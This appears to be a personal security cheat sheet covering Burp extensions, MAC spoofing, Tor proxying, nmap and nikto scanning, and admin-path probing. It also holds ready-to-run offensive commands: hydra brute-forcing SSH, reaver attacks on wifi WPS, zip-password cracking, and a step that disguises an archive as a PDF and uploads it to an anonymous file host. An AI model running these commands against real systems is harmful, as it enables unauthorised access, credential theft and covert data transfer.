security cheat sheet open source software
- http://www.mh-sec.de/downloads.html.en
- Burp Suite
- JSON Beautifier
- Param miner
- HTTP Request Smuggler
- Backslash Powered Scanner
- Reflected Parameters
- Software Vulnerability Scanner
- Java Deserialization Scanner
- .Net Beautifier
- Copy As Python-Request
- Collaborator Everywhere
- Custom Parameter Handler
- Authmatrix
- GraphQL Raider
- Piper
- JSON Web Token Attacker
- InQl - Introspection GraphQL Scanner
- :TODO: shodan
- ricochet
your private key:
~/.config/rocochet-refresh....appimage/ricochet.json
- qtox client
- matrix
- kibase
- Jabber
- element
- discord
- IRC ( Internet Relay Chat Network )
Discord: Use "https://play.google.com/store/apps/details?id=com.discord&hl=en" to find out more about Discord.
# list of devices
iw dev
# sudo apt-get install macchanger
macchanger -s wlp1s0
sudo ifconfig wlp1s0 down
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0
# force rescan
nmcli device wifi rescan
# all points
nmcli device wifi
# all fields
nmcli -f ALL device wifi
# all fields with using in script
nmcli -t -f ALL device wifi
nmcli -m multiline -f ALL device wifi
# alternative way
iwlist wlan0 scan
# alternative way
iw wlan0 scan
# alternative way
sudo apt install wavemon
# install tool
apt-get install wireless-tools wpasupplicant
# save password
wpa_passphrase YourSSID >> /etc/wpa_supplicant.conf
# check adapter
iwconfig
# connect to netowrk
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf
# sudo systemctl restart wpa_supplicant
- check ip address via proxy
curl --proxy localhost:8118 'https://api.ipify.org'
curl 'https://api.ipify.org'
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
- check ip address directly
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'
- installation
sudo apt install tor
sudo apt install privoxy
- configuration sudo vim /etc/privoxy/config
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
- applying
# tor
sudo service tor restart
# /etc/init.d/privoxy start
sudo service privoxy restart
- check your ip afterwards
# via TOR
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect
curl 'https://api.ipify.org'
- stop, stop tor, stop private proxy
systemctl stop tor
systemctl status tor
systemctl stop privoxy
systemctl status privoxy
proxy list tools
https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/
# apt install whois
whois google.com
nmap -sV -p 1-65535 {hostname}
nikto -h {host name}
https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com
[2ip.ru/cms](find cms)
/rotots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login
# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port>
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port>
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port>
hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log
just create login & password
for changing manually - Cookies->https://temp-mail.org->email
after one day not possible to recover email address
- send files
- upload/download files
zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # "%PDF-1.5"
curl -i -F name=some-archive.pdf -F [email protected] https://uguu.se/api.php?d=upload | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf
# sudo apt install fcrackzip
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
fcrackzip -v -u -b 1.zip
# statistic: 8 chars - 62 days
initiate monitor mode on interface
ifconfig
# ( result - wlan0 )
airmon-ng check kill
airmon-ng check
# ( should be empty )
airmon-ng start wlan0
# ( result - wlan0mon )
airodump-ng wlan0mon
# ( result - BSSID )
reaver -i wlan0mon -b <BSSID> -vv -K 1
https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/
unzip -o ~/Downloads/dex2jar-2.1.zip -d ~/Downloads/
APK_NAME=my_app
PATH_TO_APK="${APK_NAME}.apk"
PATH_TO_DEX2JAR=~/Downloads/dex-toos-2.1/d2j-dex2jar.sh
sh $PATH_TO_DEX2JAR -f $PATH_TO_APK
# result
ls -la "${APK_NAME}-dex2jar.jar"
jar to java tool jar to java tool download
java -jar jd-gui-1.6.6-min.jar
sudo apt install python3-pip python3-setuptools python3-pyqt5 libsecp256k1-dev
ELECTRUM_VERSION=4.3.2 # https://download.electrum.org/
pip3 install https://download.electrum.org/${ELECTRUM_VERSION}/Electrum-${ELECTRUM_VERSION}.tar.gz#egg=electrum[fast]